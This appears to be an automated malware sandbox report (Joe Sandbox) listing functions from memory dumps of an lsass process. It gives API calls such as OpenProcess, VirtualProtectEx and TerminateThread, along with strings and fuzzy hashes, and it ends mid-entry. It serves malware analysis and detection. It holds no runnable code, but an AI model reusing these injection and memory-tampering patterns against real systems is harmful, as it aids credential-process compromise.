FlsSetValue.KERNEL32(?,?,?,000002D6F157D6B5,?,?,?,?,000002D6F157D778), ref: 000002D6F157CFE5
FlsSetValue.KERNEL32(?,?,?,000002D6F157D6B5,?,?,?,?,000002D6F157D778), ref: 000002D6F157D012
FlsSetValue.KERNEL32(?,?,?,000002D6F157D6B5,?,?,?,?,000002D6F157D778), ref: 000002D6F157D023
FlsSetValue.KERNEL32(?,?,?,000002D6F157D6B5,?,?,?,?,000002D6F157D778), ref: 000002D6F157D034
SetLastError.KERNEL32 ref: 000002D6F157D04F

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: a6b213a5400f60c42383ff69cc1183cbdc54369affa2b4c1a008411f74401b9b
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: 781184E0304E884AFA699732B55F73961426B457F0F149727A83F47FDAEE2CCC018200

Function 000002D6F151199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002D6F15119C2
K32GetModuleFileNameExW.KERNEL32 ref: 000002D6F15119E0
PathFindFileNameW.SHLWAPI ref: 000002D6F15119EF
lstrlenW.KERNEL32 ref: 000002D6F15119FB
StrCpyW.SHLWAPI ref: 000002D6F1511A0E
CloseHandle.KERNEL32 ref: 000002D6F1511A1C

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: cff459d1bd899cdfd44676a5a381a09abba527aeb6cc39614b6ef60cc1fcaaaf
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 070129B2300E808AEB54DB62B89C75967A5F788BC4F984036DE4E53B55DF3CC989C740

Function 000002D6F157199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002D6F15719C2
K32GetModuleFileNameExW.KERNEL32 ref: 000002D6F15719E0
PathFindFileNameW.SHLWAPI ref: 000002D6F15719EF
lstrlenW.KERNEL32 ref: 000002D6F15719FB
StrCpyW.SHLWAPI ref: 000002D6F1571A0E
CloseHandle.KERNEL32 ref: 000002D6F1571A1C

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: 30fae6d9d6e726df8e09fc2420a2e646efaa82e0fd841fdca9295a1705f58575
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 210157A1314E448AEB10DB52B88C75963A1F788BD0F888036DE4E47B55DF3CC989C740

Function 000002D6F15136C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002D6F15136E4
GetCurrentProcess.KERNEL32 ref: 000002D6F15136F2
VirtualProtectEx.KERNEL32 ref: 000002D6F1513714
GetCurrentProcess.KERNEL32 ref: 000002D6F1513732
VirtualProtectEx.KERNEL32 ref: 000002D6F1513753
TerminateThread.KERNEL32 ref: 000002D6F1513762

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: 4cb24c3c5e9fa141b5df1c6a7c4a8c5dc67f34b77b6b13790439d7932f787d30
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 320129A6611F808AFF659B22F81C71963B0BB49BC6F04042ACE4E07B64EF3DC919C704

Function 000002D6F15736C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002D6F15736E4
GetCurrentProcess.KERNEL32 ref: 000002D6F15736F2
VirtualProtectEx.KERNEL32 ref: 000002D6F1573714
GetCurrentProcess.KERNEL32 ref: 000002D6F1573732
VirtualProtectEx.KERNEL32 ref: 000002D6F1573753
TerminateThread.KERNEL32 ref: 000002D6F1573762

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: 5943fd1580f195d897b2e34406dc4c73d414428226e3b4fba73f933aef0dc032
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 700117A5226F44CAFB249B22F81D31963B0BB49BD6F44442ACD4E07B65EF3DC9098704

Function 000002D6F1518FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D6F1519013
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D6F15190A8
RtlUnwindEx.NTDLL ref: 000002D6F15190F7

Strings

f, xrefs: 000002D6F1519026
csm, xrefs: 000002D6F151908E

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction ID: 3b0e631b75504db4463a701d796cd14c903cf2e77cba2ed9bb482b335b50820a
Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction Fuzzy Hash: 7C518AB2601A408EEB16DF15F85CB5937A6F384BC8F55852ADE0B67B88DB39DD81C700

Function 000002D6F1578FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D6F1579013
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D6F15790A8
RtlUnwindEx.NTDLL ref: 000002D6F15790F7

Strings

csm, xrefs: 000002D6F157908E
f, xrefs: 000002D6F1579026

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction ID: 3d0dd3fe079ada4bd8f2881e167f80dd78136bc046453439a47d5902b6e11c02
Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction Fuzzy Hash: 3851AEB2611A068EEB14CB15F85DB5937A6F384BE8F50C52BDA0B47B88DB39CC51C710

Function 000002D6F1571A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002D6F1571A60
StrCmpNIW.SHLWAPI ref: 000002D6F1571A7A
lstrlenW.KERNEL32 ref: 000002D6F1571A89
StrCpyW.SHLWAPI ref: 000002D6F1571A9E

Strings

\\?\, xrefs: 000002D6F1571A6E

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: 4e9ba4edf0bbd33cff3169a5f2e833e07c5858e7a55cb809dc8132ebdd723377
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 9CF044A2314A4596EB609B21F8CC75967A0F748BD9F948022DA4E47D54DF7CCA4DCB00

Function 000002D6F1513044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002D6F1513066
StrCpyW.SHLWAPI ref: 000002D6F1513076
StrCatW.SHLWAPI ref: 000002D6F1513082
PathCombineW.SHLWAPI ref: 000002D6F1513090

Strings

\\.\pipe\, xrefs: 000002D6F151305C

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 3e4723502f59a8f1e07ded70428830228723a6d762285bf7447ffc8a7d9f86c1
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 16F01CA6714FC486EA548F57B91C11966A1BB58FE0F089132EE4F57F18DF3CC8558700

Function 000002D6F151BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002D6F151BCBD
GetProcAddress.KERNEL32 ref: 000002D6F151BCD3
FreeLibrary.KERNEL32 ref: 000002D6F151BCFA

Strings

CorExitProcess, xrefs: 000002D6F151BCCC
mscoree.dll, xrefs: 000002D6F151BCB4

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 23a4a7cfba681eafd7acd153de910ccfab7048bd4207ecad1fa1577b34c1d807
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: 55F06DA2211E8585EB248F24F84C3696330EB99BE5F94121ACE6F46AE4CF2CC9488340

Function 000002D6F1573044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002D6F1573066
StrCpyW.SHLWAPI ref: 000002D6F1573076
StrCatW.SHLWAPI ref: 000002D6F1573082
PathCombineW.SHLWAPI ref: 000002D6F1573090

Strings

\\.\pipe\, xrefs: 000002D6F157305C

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: cfbdc10649159751a95959a064a02ea57873d56d1913454f7108c669402796ba
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 87F01CA5728F8487EB549B57B91C15966A1AB48FE0F089132EE4F47F18DF3CC8498700

Function 000002D6F157BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002D6F157BCBD
GetProcAddress.KERNEL32 ref: 000002D6F157BCD3
FreeLibrary.KERNEL32 ref: 000002D6F157BCFA

Strings

CorExitProcess, xrefs: 000002D6F157BCCC
mscoree.dll, xrefs: 000002D6F157BCB4

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 20a96c496cc53890de35e1815668b95711ddb10070cf0e2248e09b86cfad44e8
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: D2F062E1325F058AEB108B25F44D3696320EB847F5F54421BCA6F469E4DF2CC9458300

Function 000002D6F15150D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D6F1515156

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: 42075970a9a9322463efdc1a56445cb29a1d8840ca77651260a4224c7a6fbde6
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: 7302B576219B848AEB61CF55F49835AB7A1F3857D4F100016EA8E97BA9DB7CC884CF00

Function 000002D6F15750D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D6F1575156

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: c328fe901491eadfcf133f95a27b323ab66784f069a122bcab713d23c3b0d380
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: 08029576219B888AEB60CB55F49975AB7A1F3847D4F104017EA8E87BA8DB7CC844CF40

Function 000002D6F1515710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D6F1515726

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: 3ee684a2051b0626537bb21df19f72d7656a23c79b275dde9432cc418d5cd82d
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: 4461B2B6529E84CAEA618F15F49D31AB7A1F3897C4F100116EA8E57FA8DB7CC841CF40

Function 000002D6F1575710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D6F1575726

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: 423d1428fd4ff0a79e18e4ef71d5da1a7ab2de87cb8d2211654a8246bf336b50
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: 726198B6529E84CAEA608B15F49D31AB7A0F3887D4F504117EA8E47FA8DB7CC940CF44

Function 000002D6F1524104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002D6F152412C
_set_statfp.LIBCMT ref: 000002D6F1524147
_set_statfp.LIBCMT ref: 000002D6F1524163
_set_statfp.LIBCMT ref: 000002D6F152419F

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 424267331a93190a57d2639305031bc8998964835541697d1ff8627115ec689c
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: E11173A7B10FD119F7641768F45D36621416F783F8F280626EA7F17ED6CA6CCC418200

Function 000002D6F1584104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002D6F158412C
_set_statfp.LIBCMT ref: 000002D6F1584147
_set_statfp.LIBCMT ref: 000002D6F1584163
_set_statfp.LIBCMT ref: 000002D6F158419F

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: ab6350854940c6af69b0ba6188dba2f6dddd4797bab6a4e6d4c76438ca6c93bc
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: B21170B2B3CF512BF6641768F85E36A11416B783F8F190626AD7F17EE6CA2CCC418600

Function 000002D6F14F3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002D6F14F352C
_set_statfp.LIBCMT ref: 000002D6F14F3547
_set_statfp.LIBCMT ref: 000002D6F14F3563
_set_statfp.LIBCMT ref: 000002D6F14F359F

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: ba703c9331ee713b56c495894a3d73b0a2062aaebb232e8d6e30e25fb009abb4
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 12117323A14E5119FBA41769F45D36911816BD93F4F889A3AAA770FFDECA2CCC45C110

Function 000002D6F14EF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002D6F14EF124

Strings

Tuesday, xrefs: 000002D6F14EF0F4
or copy constructor iterator', xrefs: 000002D6F14EF25A, 000002D6F14EF275
Wednesday, xrefs: 000002D6F14EF1ED

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: e6160abfd5a2cc9cf80f440168c8954cb50692cc9a53660c5a43eaca46e9ff2f
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: C3619C72601E448AFA6DCB69F54C32AAAA1A7C67C0F55451BCA0B07FECDB3DCE458301

Function 000002D6F151AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002D6F151AA68
_CallSETranslator.LIBVCRUNTIME ref: 000002D6F151AAB7

Strings

MOC, xrefs: 000002D6F151AA7C
RCC, xrefs: 000002D6F151AA85

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 1d7432d42cb839326b1ec519d8e3b4db095f3ae002e7f932d77f27b7b20c2c01
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 556158B7600B848AEB22DFA5E44879D77A0F344BDCF044616EE4E27B98DB78C995C700

Function 000002D6F157AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002D6F157AA68
_CallSETranslator.LIBVCRUNTIME ref: 000002D6F157AAB7

Strings

RCC, xrefs: 000002D6F157AA85
MOC, xrefs: 000002D6F157AA7C

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: c18034dbc11df50b6c50a04c626263d301c1f4bb62dfaf7106fd9405434fbc65
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 7E6149B2600B888AEB109FA5E44939D77A1F344B98F188617EF4E17B98DB78C995C700

Function 000002D6F151AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D6F151ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002D6F151AE88

Strings

csm, xrefs: 000002D6F151AEDA
csm, xrefs: 000002D6F151ADC2

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: a1fa52ff5b8a92164aef8a90dc21d442fce71749ed4764205dc9c63b39132c2b
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 72517CB6100AC08EEB668FA5A48C35977A0F354BD9F144217DA9EA7FD5CB3CD891C701

Function 000002D6F157AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D6F157ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002D6F157AE88

Strings

csm, xrefs: 000002D6F157AEDA
csm, xrefs: 000002D6F157ADC2

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 6c289e620df851ebce735931ffc488a850c5cb96559f84f67767045b8f16be73
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 81517FB6100A888EEB648BA5A58E35977A0F354BD5F18D117EA6E47FD5CB3CD890C700

Function 000002D6F14EA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D6F14EA1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002D6F14EA288

Strings

csm, xrefs: 000002D6F14EA1C2
csm, xrefs: 000002D6F14EA2DA

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: cfee3a79a6332420dfddfd621a8844a6e200f43d99eb8e2e0c62dd5cb1a16251
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 89517C32100A80CEEB64CB25A54C35877A1F795BD4F288217DA9A87FD9CB7CDA90CB11

Function 000002D6F14E8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002D6F14E8413
_IsNonwritableInCurrentImage.LIBCMT ref: 000002D6F14E84A8

Strings

csm, xrefs: 000002D6F14E848E
f, xrefs: 000002D6F14E8426

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
